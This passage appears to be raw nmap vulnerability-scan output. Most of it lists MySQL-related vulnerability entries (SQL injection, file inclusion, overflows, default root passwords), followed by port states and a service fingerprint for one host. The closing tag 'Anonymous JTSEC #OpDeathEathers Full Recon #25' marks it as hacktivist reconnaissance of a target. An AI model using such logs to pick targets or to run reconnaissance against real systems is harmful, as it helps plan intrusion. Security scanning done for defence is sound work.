22477| [64320] ClanSphere MySQL Driver s_email Parameter SQL Injection
22478| [63903] MySQL sql/sql_plugin.cc mysql_uninstall_plugin Function UNINSTALL PLUGIN Command Privilege Check Weakness
22479| [63115] Quicksilver Forums mysqldump Process List Database Password Disclosure
22480| [62830] Employee Timeclock Software mysqldump Command-line Database Password Disclosure
22481| [62640] PHP mysqli_real_escape_string() Function Error Message Path Disclosure
22482| [62216] Flex MySQL Connector ActionScript SQL Query Arbitrary Code Execution
22483| [61752] kiddog_mysqldumper Extension for TYPO3 Unspecified Information Disclosure
22484| [61497] microTopic admin/mysql.php rating Parameter SQL Injection
22485| [60665] MySQL CREATE TABLE MyISAM Table mysql_unpacked_real_data_home Local Restriction Bypass
22486| [60664] MySQL sql/sql_table.cc Data Home Directory Symlink CREATE TABLE Access Restriction Bypass
22487| [60516] RADIO istek scripti estafresgaftesantusyan.inc Direct Request MySQL Database Credentials Disclosure
22488| [60489] MySQL GeomFromWKB() Function First Argument Geometry Value Handling DoS
22489| [60488] MySQL SELECT Statement WHERE Clause Sub-query DoS
22490| [60487] MySQL vio_verify_callback() Function Crafted Certificate MiTM Weakness
22491| [60356] MySql Client Library (libmysqlclient) mysql_real_connect Function Local Overflow
22492| [59907] MySQL on Windows bind-address Remote Connection Weakness
22493| [59906] MySQL on Windows Default Configuration Logging Weakness
22494| [59616] MySQL Hashed Password Weakness
22495| [59609] Suckbot mod_mysql_logger Shared Object Unspecified Remote DoS
22496| [59495] Cyrus SASL LDAP / MySQL Authentication Patch password Field SQL Injection Authentication Bypass
22497| [59062] phpMyAdmin Extension for TYPO3 MySQL Table Name Unspecified XSS
22498| [59045] phpMyAdmin Crafted MYSQL Table Name XSS
22499| [59030] mysql-ocaml for MySQL mysql_real_escape_string() Function Character Escaping Weakness
22500| [57587] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Local Privilege Escalation
22501| [57586] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Remote Shell Command Execution
22502| [56741] MySQL Connector/J Unicode w/ SJIS/Windows-31J Charset SQL Injection
22503| [56134] Virtualmin MySQL Module Execute SQL Feature Arbitrary File Access
22504| [55734] MySQL sql_parse.cc dispatch_command() Function Format String DoS
22505| [55566] MySQL Connector/NET SSL Certificate Verification Weakness
22506| [53525] MyBlog /config/mysqlconnection.inc Direct Request Information Disclosure
22507| [53524] blog+ includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
22508| [53523] blog+ includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
22509| [53522] blog+ includes/block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
22510| [53521] blog+ includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
22511| [53520] blog+ includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
22512| [53519] blog+ includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
22513| [53366] GEDCOM_TO_MYSQL php/info.php Multiple Parameter XSS
22514| [53365] GEDCOM_TO_MYSQL php/index.php nom_branche Parameter XSS
22515| [53364] GEDCOM_TO_MYSQL php/prenom.php Multiple Parameter XSS
22516| [53360] Blogplus includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
22517| [53359] Blogplus includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
22518| [53358] Blogplus includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
22519| [53357] Blogplus includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
22520| [53356] Blogplus block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
22521| [53355] Blogplus includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
22522| [53110] XOOPS Cube Legacy ErrorHandler::show() Function MySQL Error Message XSS
22523| [52729] Asterisk-addon cdr_addon_mysql.c Call Detail Record SQL Injection
22524| [52728] Tribox cdr_addon_mysql.c Call Detail Record XSS
22525| [52727] FreePBX cdr_addon_mysql.c Call Detail Record XSS
22526| [52726] Areski cdr_addon_mysql.c Call Detail Record XSS
22527| [52464] MySQL charset Column Truncation Weakness
22528| [52453] MySQL sql/item_xmlfunc.cc ExtractValue() / UpdateXML() Functions Scalar XPath DoS
22529| [52378] Cisco ANM MySQL root Account Default Password
22530| [52264] Broadcast Machine MySQLController.php controllers/baseDir Parameter Remote File Inclusion
22531| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
22532| [51171] MySQL InnoDB convert_search_mode_to_innobase Function DoS
22533| [50892] MySQL Calendar index.php username Parameter SQL Injection
22534| [50827] Nodstrum MySQL Calendar nodstrumCalendarV2 Cookie Manipulation Admin Authentication Bypass
22535| [49875] PromoteWeb MySQL go.php id Parameter SQL Injection
22536| [48710] MySQL Command Line Client HTML Output XSS
22537| [48709] MySQL Quick Admin actions.php lang Parameter Traversal Local File Inclusion
22538| [48708] MySQL Quick Admin index.php language Cookie Traversal Local File Inclusion
22539| [48021] MySQL Empty Bit-String Literal Token SQL Statement DoS
22540| [47789] mysql-lists Unspecified XSS
22541| [47394] Keld PHP-MySQL News Script login.php username Parameter SQL Injection
22542| [45073] MySQLDumper Extension for TYPO3 Unspecified Authentication Bypass
22543| [44937] MySQL MyISAM Table CREATE TABLE Privilege Check Bypass
22544| [44138] Debian GNU/Linux libdspam7-drv-mysql Cron MySQL dspam Database Password Local Disclosure
22545| [44071] Phorum /include/db/mysql.php Unspecified Search SQL Injection
22546| [43180] MySQL sql_select.cc INFORMATION_SCHEMA Table Crafted Query Remote DoS
22547| [43179] MySQL Server BINLOG Statement Rights Checking Failure
22548| [42610] MySQL DEFINER View Value Crafted Statements Remote Privilege Escalation
22549| [42609] MySQL Federated Engine SHOW TABLE STATUS Query Remote DoS
22550| [42608] MySQL RENAME TABLE Symlink System Table Overwrite
22551| [42607] MySQL Multiple table-level DIRECTORY Remote Privilege Escalation
22552| [42460] MySQLDumper HTTP POST Request Remote Authentication Bypass
22553| [42423] AdventNet EventLog Analyzer MySQL Installation Default root Account
22554| [41861] Bacula make_catalog_backup Function MySQL Director Password Cleartext Disclosure
22555| [40232] PHP MySQL Banner Exchange inc/lib.inc Direct Request Database Disclosure
22556| [40188] Password Manager Pro (PMP) mysql Unspecified Remote Command Injection
22557| [39279] PHP mysql_error() Function XSS
22558| [39145] aurora framework db_mysql.lib pack_var() value Parameter SQL Injection
22559| [38567] NetClassifieds Mysql_db.php Halt_On_Error Setting Error Message Path Disclosure
22560| [38112] Excel Parser Pro sample/xls2mysql parser_path Parameter Remote File Inclusion
22561| [37880] Asterisk-Addons source/destination Numbers cdr_addon_mysql Module SQL Injection
22562| [37784] PHP MySQL Extension Multiple Function Security Restriction Bypass
22563| [37783] MySQL Community Server CREATE TABLE LIKE Table Structure Disclosure
22564| [37782] MySQL Community Server External Table View Privilege Escalation
22565| [37781] MySQL ALTER TABLE Information Disclosure
22566| [37539] GPL PHP Board db.mysql.inc.php root_path Parameter Remote File Inclusion
22567| [37195] Eve-Nuke Module for PHP-Nuke db/mysql.php phpbb_root_path
22568| [37015] paBugs class.mysql.php path_to_bt_dir Parameter Remote File Inclusion
22569| [36868] PHP MySQLi Extension LOCAL INFILE Operation Security Restriction Bypass
22570| [36867] PHP MySQL Extension LOCAL INFILE Operation Security Restriction Bypass
22571| [36771] InterWorx-CP SiteWorx mysql.php PATH_INFO Parameter XSS
22572| [36757] InterWorx-CP NodeWorx mysql.php PATH_INFO Parameter XSS
22573| [36732] MySQL Community Server Connection Protocol Malformed Password Packet Remote DoS
22574| [36251] Associated Press (AP) Newspower Default MySQL root Password
22575| [35168] Study Planner (Studiewijzer) db/mysql/db.inc.php SPL_CFG[dirroot] Parameter Remote File Inclusion
22576| [35037] Fantastico for cPanel includes/mysqlconfig.php fantasticopath Parameter Traversal Local File Inclusion
22577| [34780] Backup Manager Command Line Cleartext MySQL Password Disclosure
22578| [34766] MySQL RENAME TABLE Statement Arbitrary Table Name Modification
22579| [34765] MySQL mysql_change_db Function THD::db_access Privilege Escalation
22580| [34734] MySQL Crafted IF Clause Divide-by-zero NULL Dereference DoS
22581| [34038] MySQL Commander ressourcen/dbopen.php home Parameter Remote File Inclusion
22582| [33974] MySQL information_schema Table Subselect Single-Row DoS
22583| [33678] MySQLNewsEngine affichearticles.php3 newsenginedir Parameter Remote File Inclusion
22584| [33447] WGS-PPC (PPC Search Engine) config/mysql_config.php INC Parameter Remote File Inclusion
22585| [33372] deV!L'z Clanportal inc/filebrowser/browser.php MySQL Data Disclosure
22586| [33147] ActiveCalendar data/mysqlevents.php css Parameter XSS
22587| [32784] Storystream mysqli.php baseDir Parameter Remote File Inclusion
22588| [32783] Storystream mysql.php baseDir Parameter Remote File Inclusion
22589| [32421] Contenido CMS conlib/db_mysqli.inc Direct Request Path Disclosure
22590| [32272] JevonCMS /phplib/db_mysql.inc Direct Request Path Disclosure
22591| [32171] Blue Magic Board db_mysql_error.php Direct Request Path Disclosure
22592| [32056] BTSaveMySql Direct Request Config File Disclosure
22593| [32044] cPanel WebHost Manager (WHM) scripts/passwdmysql password Parameter XSS
22594| [32024] TikiWiki tiki-wiki_rss.php ver MySQL Credential Disclosure
22595| [31963] Agora MysqlfinderAdmin.php _SESSION[PATH_COMPOSANT] Parameter Remote File Inclusion
22596| [31431] ZoomStats libs/dbmax/mysql.php GLOBALS[lib][db][path] Parameter Remote File Inclusion
22597| [30172] TikiWiki Multiple Script Empty sort_mode Parameter MySQL Authentication Credential Disclosure
22598| [29696] MySQLDumper sql.php db Parameter XSS
22599| [29453] ConPresso CMS db_mysql.inc.php msg Parameter XSS
22600| [29122] cPanel mysqladmin/hooksadmin Unspecified Privilege Escalation
22601| [28296] MySQL Crafted multiupdate / subselects Query Local DoS
22602| [28288] MySQL Instance_options::complete_initialization Function Overflow
22603| [28030] Tutti Nova class.novaRead.mysql.php TNLIB_DIR Parameter Remote File Inclusion
22604| [28029] Tutti Nova class.novaAdmin.mysql.php TNLIB_DIR Parameter Remote File Inclusion
22605| [28028] Tutti Nova class.novaEdit.mysql.php TNLIB_DIR Parameter Remote File Inclusion
22606| [28013] MySQL SUID Routine Miscalculation Arbitrary DML Statement Execution
22607| [28012] MySQL Case Sensitivity Unauthorized Database Creation
22608| [27919] MySQL VIEW Access information_schema.views Information Disclosure
22609| [27703] MySQL MERGE Table Privilege Persistence
22610| [27593] Drupal database.mysqli.inc Multiple Parameter SQL Injection
22611| [27549] Opsware NAS /etc/init.d/mysqll MySQL root Cleartext Password Local Disclosure
22612| [27416] MySQL Server time.cc date_format Function Format String
22613| [27054] MySQL mysqld str_to_date Function NULL Argument DoS
22614| [26923] PHP/MySQL Classifieds (PHP Classifieds) search.php rate Parameter SQL Injection
22615| [26922] PHP/MySQL Classifieds (PHP Classifieds) AddAsset1.php Multiple Field XSS
22616| [26822] Bee-hive Lite include/listall.inc.php mysqlcall Parameter Remote File Inclusion
22617| [26821] Bee-hive Lite conad/include/mysqlCall.inc.php config Parameter Remote File Inclusion
22618| [26820] Bee-hive Lite conad/logout.inc.php mysqlCall Parameter Remote File Inclusion
22619| [26819] Bee-hive Lite conad/login.inc.php mysqlCall Parameter Remote File Inclusion
22620| [26818] Bee-hive Lite conad/checkPasswd.inc.php mysqlCall Parameter Remote File Inclusion
22621| [26817] Bee-hive Lite conad/changeUserDetails.inc.php mysqlCall Parameter Remote File Inclusion
22622| [26816] Bee-hive Lite conad/changeEmail.inc.php mysqlCall Parameter Remote File Inclusion
22623| [26125] Open Searchable Image Catalogue core.php do_mysql_query Function Error Message XSS
22624| [26123] Open Searchable Image Catalogue core.php do_mysql_query Function SQL Injection
22625| [25987] MySQL Multibyte Encoding SQL Injection Filter Bypass
22626| [25908] Drupal database.mysql.inc Multiple Parameter SQL Injection
22627| [25595] Apple Mac OS X MySQL Manager Blank root Password
22628| [25228] MySQL Crafted COM_TABLE_DUMP Request Arbitrary Memory Disclosure
22629| [25227] MySQL COM_TABLE_DUMP Packet Overflow
22630| [25226] MySQL Malformed Login Packet Remote Memory Disclosure
22631| [24245] Cholod Mysql Based Message Board Unspecified XSS
22632| [24244] Cholod Mysql Based Message Board mb.cgi showmessage Action SQL Injection
22633| [23963] WoltLab Burning Board class_db_mysql.php SQL Error Message XSS
22634| [23915] Netcool/NeuSecure MySQL Database Connection Restriction Bypass
22635| [23611] Aztek Forum index.php msg Variable Forced MySQL Error Information Disclosure
22636| [23526] MySQL Query NULL Charcter Logging Bypass
22637| [23157] PHP/MYSQL Timesheet changehrs.php Multiple Parameter SQL Injection
22638| [23156] PHP/MYSQL Timesheet index.php Multiple Parameter SQL Injection
22639| [22995] PAM-MySQL Authentication pam_get_item() Function Unspecified Privilege Escalation
22640| [22994] PAM-MySQL SQL Logging Facility Segfault DoS
22641| [22485] Recruitment Software admin/site.xml MySQL Authentication Credential Disclosure
22642| [22479] PHP mysqli Extension Error Message Format String
22643| [22232] PHP Pipe Variable mysql_connect() Function Overflow
22644| [21685] MySQL Auction Search Module keyword XSS
22645| [20698] Campsite notifyendsubs Cron MySQL Password Cleartext Remote Disclosure
22646| [20145] Proofpoint Protection Server Embedded MySQL Server Unpassworded root Account
22647| [19457] aMember Pro mysql.inc.php Remote File Inclusion
22648| [19377] MAXdev MD-Pro /MySQL_Tools/admin.php Path Disclosure
22649| [18899] MySQL UDF Library Arbitrary Function Load Privilege Escalation
22650| [18898] MySQL UDF LoadLibraryEx Function Nonexistent Library Load DoS
22651| [18897] MySQL on Windows UDF Create Function Traversal Privilege Escalation
22652| [18896] MySQL User-Defined Function init_syms() Function Overflow
22653| [18895] MySQL libmysqlclient.so host Parameter Remote Overflow
22654| [18894] MySQL drop database Request Remote Overflow
22655| [18622] FunkBoard mysql_install.php Email Field Arbitrary PHP Code Injection
22656| [18620] FunkBoard mysql_install.php Admin/Database Password Manipulation
22657| [18406] MySQL Eventum releases.php SQL Injection
22658| [18405] MySQL Eventum custom_fields_graph.php SQL Injection
22659| [18404] MySQL Eventum custom_fields.php SQL Injection
22660| [18403] MySQL Eventum login.php email Parameter SQL Injection Authentication Bypass
22661| [18402] MySQL Eventum get_jsrs_data.php F Parameter XSS
22662| [18401] MySQL Eventum list.php release Parameter XSS
22663| [18400] MySQL Eventum view.php id Parameter XSS
22664| [18173] MySQL on Windows USE Command MS-DOS Device Name DoS
22665| [17801] Bugzilla MySQL Replication Race Condition Information Disclosure
22666| [17223] xMySQLadmin Symlink Arbitrary File Deletion
22667| [16727] MySQL Nonexistent '--user' Error Incorrect Privilege Database Invocation
22668| [16689] MySQL mysql_install_db Symlink Arbitrary File Overwrite
22669| [16056] Plans Unspecified mySQL Remote Password Disclosure
22670| [15993] MySQL MaxDB Webtool Remote getIfHeader() WebDAV Function Remote Overflow
22671| [15817] MySQL MaxDB Web Tool getLockTokenHeader() Function Remote Overflow
22672| [15816] MySQL MaxDB Web Administration Service Malformed GET Request Overflow
22673| [15451] paNews auth.php mysql_prefix Parameter SQL Injection
22674| [14748] MySQL MS-DOS Device Names Request DoS
22675| [14678] MySQL CREATE FUNCTION Arbitrary libc Code Execution
22676| [14677] MySQL CREATE FUNCTION mysql.func Table Arbitrary Library Injection
22677| [14676] MySQL CREATE TEMPORARY TABLE Symlink Privilege Escalation
22678| [14386] phpMyAdmin mysqli.dbi.lib.php Path Disclosure
22679| [14052] Symantec Brightmail AntiSpam Multiple Default MySQL Accounts
22680| [13086] MySQL MaxDB Web Agent Malformed HTTP Header DoS
22681| [13085] MySQL MaxDB Web Agent WebDAV sapdbwa_GetUserData() Function Remote DoS
22682| [13013] MySQL mysqlaccess.sh Symlink Arbitrary File Manipulation
22683| [12919] MySQL MaxDB WebAgent websql Remote Overflow
22684| [12779] MySQL User Defined Function Privilege Escalation
22685| [12609] MySQL Eventum projects.php Multiple Parameter XSS
22686| [12608] MySQL Eventum preferences.php Multiple Parameter XSS
22687| [12607] MySQL Eventum forgot_password.php email Parameter XSS
22688| [12606] MySQL Eventum index.php email Parameter XSS
22689| [12605] MySQL Eventum Default Vendor Account
22690| [12275] MySQL MaxDB Web Tools wahttp Nonexistent File Request DoS
22691| [12274] MySQL MaxDB Web Tools WebDAV Handler Remote Overflow
22692| [11689] Roxen Web Server MySQL Socket Permission Weakness
22693| [10985] MySQL MATCH..AGAINST Query DoS
22694| [10959] MySQL GRANT ALL ON Privilege Escalation
22695| [10660] MySQL ALTER TABLE/RENAME Forces Old Permission Checks
22696| [10659] MySQL ALTER MERGE Tables to Change the UNION DoS
22697| [10658] MySQL mysql_real_connect() Function Remote Overflow
22698| [10532] MySQL MaxDB webdbm Server Field DoS
22699| [10491] AWS MySQLguest AWSguest.php Script Insertion
22700| [10244] MySQL libmysqlclient Prepared Statements API Overflow
22701| [10226] MySQLGuest AWSguest.php Multiple Field XSS
22702| [9912] PHP safe_mode MySQL Database Access Restriction Bypass
22703| [9911] Inter7 vpopmail MySQL Module Authentication Credential Disclosure
22704| [9910] MySQL mysql_change_user() Double-free Memory Pointer DoS
22705| [9909] MySQL datadir/my.cnf Modification Privilege Escalation
22706| [9908] MySQL my.ini Initialization File datadir Parameter Overflow
22707| [9907] MySQL SELECT Statement String Handling Overflow
22708| [9906] MySQL GRANT Privilege Arbitrary Password Modification
22709| [9509] teapop MySQL Authentication Module SQL Injection
22710| [9018] MySQL Backup Pro getbackup() Method Unspecified Issue
22711| [9015] MySQL mysqlhotcopy Insecure Temporary File Creation
22712| [8997] Cacti config.php MySQL Authentication Credential Cleartext Disclosure
22713| [8979] MySQL SHOW GRANTS Encrypted Password Disclosure
22714| [8889] MySQL COM_TABLE_DUMP Package Negative Integer DoS
22715| [8888] MySQL COM_CHANGE_USER Command Long Repsonse Overflow
22716| [8887] MySQL COM_CHANGE_USER Command One Character Password Brute Force
22717| [8886] MySQL libmysqlclient Library read_one_row Overflow
22718| [8885] MySQL libmysqlclient Library read_rows Overflow
22719| [7476] MySQL Protocol 4.1 Authentication Scramble String Overflow
22720| [7475] MySQL Zero-length Scrambled String Crafted Packet Authentication Bypass
22721| [7245] MySQL Pluggable Authentication Module (pam_mysql) Password Disclosure
22722| [7128] MySQL show database Database Name Exposure
22723| [6716] MySQL Database Engine Weak Authentication Information Disclosure
22724| [6605] MySQL mysqld Readable Log File Information Disclosure
22725| [6443] PowerPhlogger db_dump.php View Arbitrary mySQL Dump
22726| [6421] MySQL mysqld_multi Symlink Arbitrary File Overwrite
22727| [6420] MySQL mysqlbug Symlink Arbitrary File Overwrite
22728| [2537] MySQL sql_acl.cc get_salt_from_password Function Password Handling Remote Overflow
22729| [2144] WinMySQLadmin my.ini Cleartext Password Disclosure
22730| [653] PCCS-Linux MySQL Database Admin Tool Authentication Credential Disclosure
22731| [520] MySQL Database Name Traversal Arbitrary File Modification
22732| [380] MySQL Server on Windows Default Null Root Password
22733| [261] MySQL Short Check String Authentication Bypass
22734|_
227356667/tcp filtered irc
227366668/tcp filtered irc
227376669/tcp filtered irc
227381 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
22739SF-Port993-TCP:V=7.80%T=SSL%I=7%D=2/29%Time=5E5A0CBD%P=x86_64-pc-linux-gnu
22740SF:%r(NULL,6A,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20SASL-IR\x20LOGIN-R
22741SF:EFERRALS\x20ID\x20ENABLE\x20IDLE\x20LITERAL\+\x20AUTH=PLAIN\]\x20Doveco
22742SF:t\x20DA\x20ready\.\r\n");
22743Service Info: Host: server98222.domain.local; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
22744#####################################################################################################################################
22745 Anonymous JTSEC #OpDeathEathers Full Recon #25